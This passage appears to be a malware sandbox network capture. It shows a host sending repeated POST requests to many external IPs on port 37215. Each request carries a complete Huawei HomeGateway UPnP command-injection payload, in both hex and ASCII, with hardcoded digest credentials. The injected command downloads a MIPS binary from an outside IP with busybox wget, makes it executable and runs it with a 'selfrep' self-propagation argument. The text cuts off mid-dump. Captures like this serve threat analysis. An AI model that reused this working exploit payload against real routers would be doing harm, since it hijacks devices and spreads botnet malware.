                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2408192.168.2.133961880.109.191.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795574903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2409192.168.2.1333904120.77.44.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795723915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2410192.168.2.1343520157.244.17.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.796787024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2411192.168.2.135114041.101.85.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.796957970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2412192.168.2.134320841.225.103.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.796988964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2413192.168.2.1343756197.37.109.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.796991110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2414192.168.2.135440241.189.151.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.797604084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2415192.168.2.1360012221.252.196.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.797732115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2416192.168.2.134213623.225.176.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.798221111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2417192.168.2.1344728157.161.135.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.798250914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 